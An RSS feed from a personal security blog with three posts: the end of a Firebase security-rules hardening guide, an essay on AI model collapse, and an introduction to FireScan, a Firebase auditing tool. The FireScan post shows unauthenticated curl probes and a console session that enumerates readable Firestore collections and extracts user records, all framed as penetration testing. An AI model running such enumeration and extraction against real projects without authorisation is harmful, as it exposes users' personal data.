    match /users/{userId} {
      allow read: if isSignedIn();
      allow write: if isOwner(userId);
    }

    match /posts/{postId} {
      allow create: if isSignedIn()
                    &amp;&amp; hasRequiredFields(['title', 'content', 'authorId'])
                    &amp;&amp; isOwner(request.resource.data.authorId);

      allow update: if isOwner(resource.data.authorId);
      allow delete: if isOwner(resource.data.authorId) || hasRole('admin');
    }
  }
}
</code></pre>
<h1 id="heading-handling-subcollections">Handling Subcollections</h1>
<p>In Firestore, rules don't cascade to subcollections. You must explicitly define rules for each level.</p>
<pre><code class="lang-plaintext">match /users/{userId} {
  allow read: if request.auth.uid == userId;

  // Subcollection requires its own rules
  match /privateData/{document} {
    allow read, write: if request.auth.uid == userId;
  }

  // Another subcollection
  match /posts/{postId} {
    allow read: if true;  // Public read
    allow write: if request.auth.uid == userId;  // Only owner can write
  }
}
</code></pre>
<p><strong>Important</strong>: A match like <code>/users/{userId}/{document=**}</code> will match ALL nested subcollections recursively. Use this carefully.</p>
<pre><code class="lang-plaintext">// This matches /users/{userId}/anything/at/any/depth
match /users/{userId}/{document=**} {
  allow read: if request.auth.uid == userId;
}
</code></pre>
<h1 id="heading-realtime-database-cascading-rules">Realtime Database: Cascading Rules</h1>
<p>In Realtime Database, rules CASCADE: access granted at a parent node applies to every child beneath it, and deeper rules cannot revoke it.</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      // This grants read access to all user data
      ".read": "auth != null",
      "$userId": {
        // This CANNOT restrict the read access granted above
        ".read": "$userId === auth.uid",  // This is IGNORED
        ".write": "$userId === auth.uid"
      }
    }
  }
}
</code></pre>
<p><strong>Correct approach</strong>: Don't grant broad access at parent levels.</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      "$userId": {
        ".read": "$userId === auth.uid",
        ".write": "$userId === auth.uid"
      }
    }
  }
}
</code></pre>
<h1 id="heading-testing-your-rules">Testing Your Rules</h1>
<h2 id="heading-use-firescan">Use FireScan</h2>
<p>Try out my purpose-built tool for auditing Firebase infrastructure. It’s completely free, open source, and available for anyone to use. Check it out <a target="_blank" href="https://firescan.jacobalcock.co.uk/">here</a>.</p>
<h2 id="heading-use-the-firebase-emulator">Use the Firebase Emulator</h2>
<p>Install and run locally:</p>
<pre><code class="lang-plaintext">npm install -g firebase-tools
firebase init emulators
firebase emulators:start
</code></pre>
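<p>With the emulator running, your rules can be exercised from automated tests. Here's a minimal sketch using the official <code>@firebase/rules-unit-testing</code> package - it assumes a <code>firestore.rules</code> file in the working directory and a <code>users</code> ruleset like the examples above, so treat it as a starting point rather than a drop-in test suite:</p>
<pre><code class="lang-javascript">const fs = require('fs');
const {
  initializeTestEnvironment,
  assertFails,
  assertSucceeds,
} = require('@firebase/rules-unit-testing');

async function main() {
  const env = await initializeTestEnvironment({
    projectId: 'demo-project',
    firestore: { rules: fs.readFileSync('firestore.rules', 'utf8') },
  });

  // Unauthenticated clients must not read user profiles
  const anon = env.unauthenticatedContext().firestore();
  await assertFails(anon.collection('users').doc('alice').get());

  // A signed-in user can read their own profile
  const alice = env.authenticatedContext('alice').firestore();
  await assertSucceeds(alice.collection('users').doc('alice').get());

  await env.cleanup();
}

main();
</code></pre>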
<h2 id="heading-use-the-rules-simulator-in-firebase-console">Use the Rules Simulator in Firebase Console</h2>
<p>Navigate to Firestore/Realtime Database → Rules → Playground</p>
<ul>
<li><p>Select operation type (get, list, create, etc.)</p>
</li>
<li><p>Choose authenticated or unauthenticated</p>
</li>
<li><p>Specify the path</p>
</li>
<li><p>Run simulation</p>
</li>
</ul>
<p>This is useful for quick checks but not a substitute for proper testing.</p>
<h1 id="heading-common-mistakes-to-avoid">Common Mistakes to Avoid</h1>
<h2 id="heading-1-using-if-true-in-production">1. Using <code>if true</code> in Production</h2>
<pre><code class="lang-plaintext">// NEVER DO THIS
match /{document=**} {
  allow read, write: if true;
}
</code></pre>
<h2 id="heading-2-relying-only-on-requestauth-null">2. Relying Only on <code>request.auth != null</code></h2>
<pre><code class="lang-plaintext">// This allows ANY authenticated user to access ANY data
match /users/{userId} {
  allow read, write: if request.auth != null;  // Too permissive
}

// Better: verify the user matches
match /users/{userId} {
  allow read, write: if request.auth != null &amp;&amp; request.auth.uid == userId;
}
</code></pre>
<h2 id="heading-3-forgetting-realtime-database-cascade-rules">3. Forgetting Realtime Database Cascade Rules</h2>
<pre><code class="lang-plaintext">{
  "rules": {
    "data": {
      ".read": true,  // Grants read to everything below
      "private": {
        ".read": false  // This is IGNORED, read was already granted above
      }
    }
  }
}
</code></pre>
<h2 id="heading-4-not-validating-data-on-createupdate">4. Not Validating Data on Create/Update</h2>
<pre><code class="lang-plaintext">// Bad: No validation
match /posts/{postId} {
  allow create: if request.auth != null;
}

// Good: Validate required fields and author
match /posts/{postId} {
  allow create: if request.auth != null
                &amp;&amp; request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
                &amp;&amp; request.resource.data.authorId == request.auth.uid;
}
</code></pre>
<h2 id="heading-5-allowing-field-modification-that-shouldnt-change">5. Allowing Field Modification That Shouldn't Change</h2>
<pre><code class="lang-plaintext">// Bad: User can change the author
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId;
}

// Good: Prevent changing the author field
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId
                &amp;&amp; request.resource.data.authorId == resource.data.authorId;
}
</code></pre>
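<p>Pinning fields one at a time works, but gets verbose as the frozen set grows. Rules version 2 also provides <code>diff()</code>, which compares the incoming document against the stored one - a sketch that allows only an explicit set of fields to change:</p>
<pre><code class="lang-plaintext">// Only title and content may be modified; every other field is frozen
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId
                &amp;&amp; request.resource.data.diff(resource.data)
                     .affectedKeys()
                     .hasOnly(['title', 'content']);
}
</code></pre>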
<h2 id="heading-6-overusing-get-and-exists">6. Overusing <code>get()</code> and <code>exists()</code></h2>
<p>Each <code>get()</code> or <code>exists()</code> call in your rules counts as a read operation and costs money. You're also limited to 10 calls per request.</p>
<pre><code class="lang-plaintext">// Bad: Multiple get() calls
match /posts/{postId} {
  allow read: if get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == 'reader'
              || get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == 'admin';
}

// Better: Use custom claims or structure data differently
match /posts/{postId} {
  allow read: if request.auth.token.reader == true
              || request.auth.token.admin == true;
}
</code></pre>
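<p>Custom claims are set server-side with the Admin SDK - never from client code. A sketch (the <code>makeAdmin</code> helper name is illustrative):</p>
<pre><code class="lang-javascript">// Run in a trusted environment: a Cloud Function, admin script, or CI job
const admin = require('firebase-admin');
admin.initializeApp();

async function makeAdmin(uid) {
  // Replaces the user's existing custom claims. The claim shows up in
  // rules as request.auth.token.admin after the client refreshes its ID token.
  await admin.auth().setCustomUserClaims(uid, { admin: true });
}
</code></pre>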
<h1 id="heading-version-control-your-rules">Version Control Your Rules</h1>
<p>Keep your rules in source control alongside your code.</p>
<p><strong>Make sure</strong> <code>.gitignore</code> doesn't exclude them - if a broader ignore pattern would catch the rules files, whitelist them explicitly:</p>
<pre><code class="lang-plaintext"># Don't ignore rules files
!firestore.rules
!database.rules.json
</code></pre>
<p><strong>Example</strong> <code>firestore.rules</code>:</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // All your rules here
  }
}
</code></pre>
<p><strong>Deploy with Firebase CLI</strong>:</p>
<pre><code class="lang-plaintext">firebase deploy --only firestore:rules
firebase deploy --only database
</code></pre>
<h1 id="heading-deployment-checklist">Deployment Checklist</h1>
<p>Before deploying rules to production:</p>
<ul>
<li><p>Remove all <code>if true</code> or <code>if false</code> test rules</p>
</li>
<li><p>Verify authentication checks on all sensitive paths</p>
</li>
<li><p>Test rules using the emulator with unit tests</p>
</li>
<li><p>Check for cascading rule issues (Realtime Database)</p>
</li>
<li><p>Validate required fields on create/update operations</p>
</li>
<li><p>Ensure users can't modify fields they shouldn't (like <code>authorId</code>)</p>
</li>
<li><p>Review <code>get()</code> and <code>exists()</code> usage (limit of 10 per request)</p>
</li>
<li><p>Test with authenticated and unauthenticated contexts</p>
</li>
<li><p>Version control your rules</p>
</li>
<li><p>Use <code>firebase deploy --only firestore:rules</code> (don't deploy everything)</p>
</li>
</ul>
<h1 id="heading-complete-example-blog-application">Complete Example: Blog Application</h1>
<p>Here's a complete, production-ready ruleset for a blog app:</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {

    // Helper functions
    function isSignedIn() {
      return request.auth != null;
    }

    function isOwner(uid) {
      return isSignedIn() &amp;&amp; request.auth.uid == uid;
    }

    function isAdmin() {
      return isSignedIn() &amp;&amp; request.auth.token.admin == true;
    }

    // User profiles
    match /users/{userId} {
      allow read: if isSignedIn();
      allow create: if isOwner(userId)
                    &amp;&amp; request.resource.data.keys().hasAll(['displayName', 'email'])
                    &amp;&amp; request.resource.data.email == request.auth.token.email;
      allow update: if isOwner(userId)
                    &amp;&amp; request.resource.data.email == resource.data.email; // Prevent email change
      allow delete: if isOwner(userId) || isAdmin();
    }

    // Blog posts
    match /posts/{postId} {
      allow read: if resource.data.published == true || isOwner(resource.data.authorId) || isAdmin();
      allow create: if isSignedIn()
                    &amp;&amp; request.resource.data.keys().hasAll(['title', 'content', 'authorId', 'published', 'createdAt'])
                    &amp;&amp; isOwner(request.resource.data.authorId)
                    &amp;&amp; request.resource.data.title is string
                    &amp;&amp; request.resource.data.title.size() &gt; 0
                    &amp;&amp; request.resource.data.title.size() &lt;= 200
                    &amp;&amp; request.resource.data.createdAt == request.time;
      allow update: if isOwner(resource.data.authorId)
                    &amp;&amp; request.resource.data.authorId == resource.data.authorId  // Prevent author change
                    &amp;&amp; request.resource.data.createdAt == resource.data.createdAt;  // Prevent timestamp change
      allow delete: if isOwner(resource.data.authorId) || isAdmin();

      // Comments subcollection
      match /comments/{commentId} {
        allow read: if true;
        allow create: if isSignedIn()
                      &amp;&amp; request.resource.data.keys().hasAll(['text', 'authorId', 'createdAt'])
                      &amp;&amp; isOwner(request.resource.data.authorId)
                      &amp;&amp; request.resource.data.text.size() &gt; 0
                      &amp;&amp; request.resource.data.text.size() &lt;= 1000;
        allow update: if isOwner(resource.data.authorId)
                      &amp;&amp; request.resource.data.authorId == resource.data.authorId;
        allow delete: if isOwner(resource.data.authorId) || isAdmin();
      }
    }
  }
}
</code></pre>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<ol>
<li><p><strong>Default to denying access</strong>. Only grant permissions where specifically needed.</p>
</li>
<li><p><strong>Always verify authentication</strong> with <code>request.auth != null</code> and check user ownership.</p>
</li>
<li><p><strong>Validate data</strong> on create and update operations.</p>
</li>
<li><p><strong>Prevent field tampering</strong> by ensuring critical fields don't change on update.</p>
</li>
<li><p><strong>Use custom claims</strong> for roles instead of repeated <code>get()</code> calls.</p>
</li>
<li><p><strong>Test your rules</strong> with the emulator and unit tests before deploying.</p>
</li>
<li><p><strong>Version control</strong> your rules and review changes like code.</p>
</li>
<li><p><strong>Understand cascading</strong> (Realtime Database) vs explicit subcollection rules (Firestore).</p>
</li>
</ol>
<p>Firebase Security Rules are powerful but require careful implementation. Take the time to write them correctly, test them thoroughly, and audit them regularly.</p>
<p>Your rules are the only thing standing between your data and unauthorised access. Make them count.</p>
]]></content:encoded></item><item><title><![CDATA[Model Collapse: The AI Feedback Loop Problem Nobody Wants to Talk About]]></title><description><![CDATA[AI models are eating their own tail, and it's going to be a problem.
The entire premise of modern LLMs is that they're trained on human-generated content. Books, articles, research papers, Stack Overflow answers, GitHub repositories - billions of tok...]]></description><link>https://blog.jacobalcock.co.uk/model-collapse-the-ai-feedback-loop-problem-nobody-wants-to-talk-about</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/model-collapse-the-ai-feedback-loop-problem-nobody-wants-to-talk-about</guid><category><![CDATA[AI]]></category><category><![CDATA[llm]]></category><category><![CDATA[Machine Learning]]></category><category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Fri, 07 Nov 2025 21:22:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/0Jk1QCGMz5o/upload/6df4cc9cb921d7503ecfb9a66a6db354.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>AI models are eating their own tail, and it's going to be a problem.</p>
<p>The entire premise of modern LLMs is that they're trained on human-generated content. Books, articles, research papers, Stack Overflow answers, GitHub repositories - billions of tokens of actual human knowledge. But that assumption is breaking down faster than anyone wants to admit.</p>
<h1 id="heading-the-core-issue">The Core Issue</h1>
<p>As we approach the end of 2025, the web is saturated with AI-generated content:</p>
<ul>
<li><p>Stack Overflow answers copy-pasted from ChatGPT</p>
</li>
<li><p>GitHub repos with AI-generated documentation and comments</p>
</li>
<li><p>Blog posts churned out by content farms using GPT</p>
</li>
<li><p>Social media posts from bots</p>
</li>
<li><p>Technical articles written entirely by LLMs</p>
</li>
</ul>
<p>Yet AI companies still scrape the web for training data. They can't reliably distinguish human content from synthetic content. Which means <strong>the next generation of models will inevitably train on the outputs of previous models</strong>.</p>
<p>This is model collapse. And it's not theoretical - it's measurable, reproducible, and already happening.</p>
<h1 id="heading-how-model-collapse-works">How Model Collapse Works</h1>
<p>The feedback loop is straightforward:</p>
<ul>
<li><p><strong>Gen 1</strong>: Train on 95% human data, 5% AI slop → minor quality issues</p>
</li>
<li><p><strong>Gen 2</strong>: Train on 80% human data, 20% AI content → noticeable degradation</p>
</li>
<li><p><strong>Gen 3</strong>: Train on 60% human data, 40% AI outputs → significant problems</p>
</li>
<li><p><strong>Gen 4</strong>: Train on majority AI-generated content → model collapse</p>
</li>
</ul>
<p>Each generation compounds the problems:</p>
<ul>
<li><p><strong>Loss of diversity</strong> - outputs converge toward homogeneous, repetitive patterns</p>
</li>
<li><p><strong>Amplified biases</strong> - quirks from previous models get magnified</p>
</li>
<li><p><strong>Increased hallucinations</strong> - errors stack across generations</p>
</li>
<li><p><strong>Tail knowledge disappears</strong> - rare but critical information gets filtered out first</p>
</li>
</ul>
<p>It's the same principle as photocopying a photocopy. Each iteration degrades the original.</p>
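<p>The photocopy effect is easy to reproduce: fit a Gaussian to the previous generation's samples, then sample the next generation from that fit. This toy simulation (my own sketch, in the spirit of the experiments in the papers linked below) shows the spread of the data collapsing over generations:</p>
<pre><code class="lang-javascript">// Toy "photocopy of a photocopy": each generation is sampled from a
// Gaussian fitted to the previous generation's finite sample.
let seed = 42;
function rand() {
  // Small linear congruential generator so the run is reproducible
  seed = (seed * 1664525 + 1013904223) % 4294967296;
  return (seed + 0.5) / 4294967296;
}
function gauss(mu, sigma) {
  // Box-Muller transform
  const u = rand();
  const v = rand();
  return mu + sigma * Math.sqrt(-2 * Math.log(u)) * Math.cos(2 * Math.PI * v);
}
function fit(xs) {
  // Maximum-likelihood mean and standard deviation
  let mean = 0;
  for (const x of xs) mean += x / xs.length;
  let variance = 0;
  for (const x of xs) variance += ((x - mean) * (x - mean)) / xs.length;
  return { mean: mean, std: Math.sqrt(variance) };
}

// Generation 0: "human" data drawn from the true distribution N(0, 1)
let data = [];
for (let i = 0; i !== 50; i++) data.push(gauss(0, 1));
const initialStd = fit(data).std;

// 500 generations, each trained only on the previous generation's output
for (let g = 0; g !== 500; g++) {
  const model = fit(data);
  const next = [];
  for (let i = 0; i !== 50; i++) next.push(gauss(model.mean, model.std));
  data = next;
}
const finalStd = fit(data).std;

console.log('gen 0 stdev:  ', initialStd.toFixed(3));
console.log('gen 500 stdev:', finalStd.toFixed(3));
</code></pre>
<p>No single generation looks broken - each one is statistically plausible on its own - which is exactly why the degradation is hard to spot until it has compounded.</p>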
<h1 id="heading-why-you-should-care">Why You Should Care</h1>
<p><strong>Code quality degradation</strong></p>
<p>If Copilot trains on AI-generated code that was itself generated by an earlier model, code suggestions degrade. You're not getting patterns from experienced developers anymore - you're getting averaged-out slop that "looks" like code.</p>
<p><strong>Security implications</strong></p>
<p>AI-assisted security tools trained on AI-generated vulnerability analyses will miss things. If the training data is full of hallucinated CVE details or incorrect exploit explanations, the model learns wrong information.</p>
<p><strong>Knowledge erosion</strong></p>
<p>Niche technical knowledge - the kind buried in obscure forum posts, old mailing lists, and forgotten documentation - disappears first. AI models optimise for common patterns. Rare but critical knowledge gets filtered out.</p>
<p><strong>Trust degradation</strong></p>
<p>You can't tell anymore if that blog post explaining a security vulnerability was written by someone who actually found and tested it, or by an LLM that pieced together fragments from six different sources and hallucinated the rest.</p>
<h1 id="heading-proposed-solutions-and-why-theyre-all-flawed">Proposed Solutions (And Why They're All Flawed)</h1>
<p><strong>Watermarking</strong></p>
<p>Embed cryptographic signatures in AI outputs to filter them during training. Google and OpenAI are researching this. Problem: watermarks can be stripped. It's an arms race.</p>
<p><strong>Provenance tracking</strong></p>
<p>Track the origin of all training data. Only use verified human content. Problem: doesn't scale. The entire value proposition of LLMs is training on massive web-scale datasets.</p>
<p><strong>Curated datasets</strong></p>
<p>Stop scraping the web entirely. Build human-verified, high-quality datasets. Problem: expensive, slow, and fundamentally limits what the model can learn.</p>
<p><strong>Adversarial filtering</strong></p>
<p>Train models to detect and exclude AI-generated text. Problem: classic adversarial arms race. Detection improves, generation improves to evade detection, repeat forever.</p>
<p><strong>Controlled synthetic mixing</strong></p>
<p>Carefully balance the ratio of real to synthetic data. Problem: requires knowing the exact contamination threshold, which varies by domain and model architecture.</p>
<p>None of these solve the core issue. And we might already be past the point of no return. The web is saturated with AI slop. Even if filtering started today, there are years of contamination already baked into datasets.</p>
<h1 id="heading-the-actual-problem">The Actual Problem</h1>
<p>We're running a one-way experiment on the future of LLMs, and nobody knows the safe parameters.</p>
<p>No one knows what percentage of AI contamination causes collapse. No one knows if current models are already degraded. No one knows how to reverse contamination once it's in the dataset.</p>
<p>LLMs were built on the assumption of abundant, renewable human knowledge. But that assumption was wrong. We're strip-mining the web for training data, and the mine doesn't refill. Every piece of human writing that gets replaced with AI slop permanently degrades the training pool.</p>
<h1 id="heading-the-economic-incentive-problem">The Economic Incentive Problem</h1>
<p>The economics make this worse. AI companies have no incentive to solve this:</p>
<ul>
<li><p>Scraping is free (legally questionable, but free)</p>
</li>
<li><p>Filtering costs money</p>
</li>
<li><p>Competition doesn't care about data quality 5 years from now</p>
</li>
<li><p>Investors reward shipping features, not long-term dataset integrity</p>
</li>
</ul>
<p>Publishers can't win either. Paywalling content to prevent scraping also blocks legitimate human readers. Not paywalling means getting drained by RAG systems that plagiarise without attribution.</p>
<p>Content creators lose traffic and revenue to AI summaries. So they either stop producing content (reducing the pool of human knowledge) or start using AI to produce more content faster (contaminating the pool).</p>
<p>It's a race to the bottom, and every participant is incentivised to make it worse.</p>
<h1 id="heading-what-actually-needs-to-happen">What Actually Needs to Happen</h1>
<p>The realistic options are limited:</p>
<ol>
<li><p><strong>Legislation requiring training data transparency</strong> - companies must disclose what they trained on and prove licensing rights</p>
</li>
<li><p><strong>Mandatory AI content labeling</strong> - cryptographic signatures that can't be easily stripped</p>
</li>
<li><p><strong>Royalty systems for scraped content</strong> - similar to how music licensing works</p>
</li>
<li><p><strong>Incentivise human-generated content</strong> - platforms that verify and reward genuine human writing</p>
</li>
</ol>
<p>None of this will happen voluntarily. The industry is too profitable and moving too fast. Regulation would need to come first, and regulators barely understand the technology.</p>
<p>More likely: we hit model collapse in 3-5 years, everyone scrambles to fix it retroactively, and we end up with some half-baked solution that only partially works.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Model collapse is not a hypothetical future problem. It's happening now, measurably, in controlled experiments. The only question is whether we're already seeing it in production models.</p>
<p>The feedback loop is real. The economic incentives ensure it will continue. And the proposed solutions all have fundamental flaws that make them unlikely to work at scale.</p>
<p>I'm not saying LLMs are doomed. I'm saying the current trajectory is unsustainable, and nobody with the power to fix it has an incentive to do so. The companies building these models are optimising for next quarter's revenue, not training data quality in 2030.</p>
<p>This will either get fixed through heavy-handed regulation, or we'll collectively find out what happens when AI models train on increasingly degraded synthetic data. My money is on the latter.</p>
<p>The snake is already eating its tail. We're just waiting to see how far down it gets before someone notices.</p>
<hr />
<p><strong>Research</strong>:</p>
<ul>
<li><p><a target="_blank" href="https://openreview.net/forum?id=5B2K4LRgmz">Is Model Collapse Inevitable? (Matthias Gerstgrasser et al., 2024)</a></p>
</li>
<li><p><a target="_blank" href="https://arxiv.org/abs/2305.17493">The Curse of Recursion (Ilia Shumailov et al., 2023)</a></p>
</li>
<li><p><a target="_blank" href="https://www.nature.com/articles/s41586-024-07566-y">AI models collapse when trained on recursively generated data (Ilia Shumailov et al., 2024)</a></p>
</li>
<li><p><a target="_blank" href="https://www.cs.ox.ac.uk/news/2356-full.html">New research warns of potential ‘collapse’ of machine learning models</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Firebase Security Is Broken. Here's the Tool I Built to Fix It.]]></title><description><![CDATA[Over the past couple of months I did a few penetration tests in which I kept encountering Firebase configurations. Each time, I found myself stringing together a bunch of cURL commands and one-off Python scripts to check for common misconfigurations. Af...]]></description><link>https://blog.jacobalcock.co.uk/firebase-security-is-broken</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/firebase-security-is-broken</guid><category><![CDATA[Security]]></category><category><![CDATA[Firebase]]></category><category><![CDATA[cybersecurity]]></category><category><![CDATA[pentesting]]></category><category><![CDATA[penetration testing]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Fri, 07 Nov 2025 09:00:23 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762472084547/c405e4a2-3897-4084-b4e2-37aaa818245e.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Over the past couple of months I did a few penetration tests in which I kept encountering Firebase configurations. Each time, I found myself stringing together a bunch of cURL commands and one-off Python scripts to check for common misconfigurations. After the third engagement, I realised this was pretty inefficient.</p>
<p>I was looking for a tool where I could just set the configuration and run enumeration checks. Something like <code>msfconsole</code> but for Firebase. I couldn't find anything that fit the bill, so <strong>I built it myself.</strong></p>
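<p>For context, here's the kind of one-off check this replaces (placeholder project ID; a 200 response with data means the resource is world-readable):</p>
<pre><code class="lang-bash"># Is the Realtime Database readable without auth?
curl -s "https://example-app-abc123-default-rtdb.firebaseio.com/.json"

# Same question for a Firestore collection, via the REST API
curl -s "https://firestore.googleapis.com/v1/projects/example-app-abc123/databases/(default)/documents/users"
</code></pre>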
<h1 id="heading-the-problem">The Problem</h1>
<p>Firebase is incredibly popular - it powers millions of apps. But its security model is... tricky. The core issue is that Firebase uses declarative security rules. A single <code>||</code> operator in the wrong place can expose your entire database.</p>
<p>During pentests, I kept seeing the same patterns:</p>
<ul>
<li><p>RTDB nodes readable without authentication</p>
</li>
<li><p>Firestore collections with open read rules</p>
</li>
<li><p>Cloud Storage buckets listing all files</p>
</li>
<li><p>Cloud Functions without proper auth checks</p>
</li>
</ul>
<p>The <a target="_blank" href="https://www.youtube.com/watch?v=npfUPhu2aZg&amp;t=184s">Tea app breach</a> is a perfect example - misconfigured Firestore rules exposed sensitive user data. This wasn't a sophisticated attack - it was just someone checking whether default or weak rules were still in place.</p>
<h1 id="heading-what-i-wanted">What I Wanted</h1>
<p>Coming from a pentesting background, I needed something that:</p>
<ol>
<li><p><strong>Works with minimal information</strong> (i.e. just the <code>projectID</code> and web API key)</p>
</li>
<li><p><strong>Tests comprehensively</strong></p>
</li>
<li><p><strong>Is safe by default</strong> (Won't accidentally damage production data)</p>
</li>
<li><p><strong>Handles authentication properly</strong></p>
</li>
<li><p><strong>Scales to large wordlists</strong></p>
</li>
</ol>
<p>None of the existing tools checked all these boxes.</p>
<h1 id="heading-introducing-firescan">Introducing FireScan</h1>
<p>FireScan is a tool designed for penetration testers and developers to audit the security posture of Firebase projects. It provides an interactive console to enumerate databases, test storage rules, check function security, and much more, all from a single, easy-to-use interface.</p>
<pre><code class="lang-bash">$ firescan
███████╗██╗██████╗ ███████╗███████╗ ██████╗ █████╗ ███╗   ██╗
██╔════╝██║██╔══██╗██╔════╝██╔════╝██╔════╝██╔══██╗████╗  ██║
█████╗  ██║██████╔╝█████╗  ███████╗██║     ███████║██╔██╗ ██║
██╔══╝  ██║██╔══██╗██╔══╝  ╚════██║██║     ██╔══██║██║╚██╗██║
██║     ██║██║  ██║███████╗███████║╚██████╗██║  ██║██║ ╚████║
╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝

FireScan v1.0 - The Firebase Security Auditor

firescan &gt; <span class="hljs-built_in">set</span> projectID my-app-12345
firescan &gt; <span class="hljs-built_in">set</span> apiKey AIza...
firescan &gt; auth --create-account
✓ Successfully authenticated
firescan &gt; scan --all
</code></pre>
<h1 id="heading-example">Example</h1>
<p>Here's a real scenario from a recent test, with the real data swapped out:</p>
<pre><code class="lang-bash">firescan &gt; <span class="hljs-built_in">set</span> projectID example-app-abc123 
firescan &gt; <span class="hljs-built_in">set</span> apiKey AIzaSy... 
firescan &gt; auth --create-account
firescan &gt; scan --firestore -l all
[✓] Scanning... [Checked: 200/200 | Found: 4]

[Firestore] Vulnerability Found!
├── Timestamp: 2025-01-15T10:23:45Z
├── Severity: High
├── Type: Firestore
└── Path: users

[Firestore] Vulnerability Found!
├── Timestamp: 2025-01-15T10:23:47Z
├── Severity: High
├── Type: Firestore
└── Path: messages

firescan &gt; extract --firestore --path users 
{
  <span class="hljs-string">"documents"</span>: [
    {
      <span class="hljs-string">"DOCUMENT_ID"</span>: <span class="hljs-string">"user_12345"</span>,
      <span class="hljs-string">"email"</span>: <span class="hljs-string">"john.doe@example.com"</span>,
      <span class="hljs-string">"name"</span>: <span class="hljs-string">"John Doe"</span>,
      ...
    }
  ]
}
</code></pre>
<p>In under 2 minutes, I found two readable collections and extracted the data. Without FireScan, this would have taken me 20 minutes of manual curl commands.</p>
<h1 id="heading-try-it-out"><strong>Try It Out</strong></h1>
<p><a target="_blank" href="https://github.com/JacobDavidAlcock/firescan"><strong>https://github.com/JacobDavidAlcock/firescan</strong></a></p>
]]></content:encoded></item></channel></rss>